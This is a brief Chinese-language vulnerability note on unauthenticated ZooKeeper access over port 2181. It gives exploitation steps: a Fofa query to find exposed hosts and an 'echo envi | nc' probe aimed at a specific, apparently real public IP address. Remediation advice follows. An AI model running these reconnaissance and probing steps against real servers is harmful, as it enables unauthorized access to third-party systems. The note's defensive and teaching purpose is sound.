Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进行破坏(比如:kill命令)。攻击者能够执行所有只允许由管理员运行的命令。
漏洞利用
步骤一:使用以下Fofa语法搜索资产信息....
port="2181"
步骤二:在Kali中使用以下命令进行未授权访问漏洞测试..
echo envi | nc 106.227.19.24 2181
步骤三:可使用Zookeeper可视化管理工具进行连接....
#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
漏洞修复
- 修改 ZooKeeper 默认端口,采用其他端口服务。
- 添加访问控制,配置服务来源地址限制策略。
- 增加 ZooKeeper 的认证配置。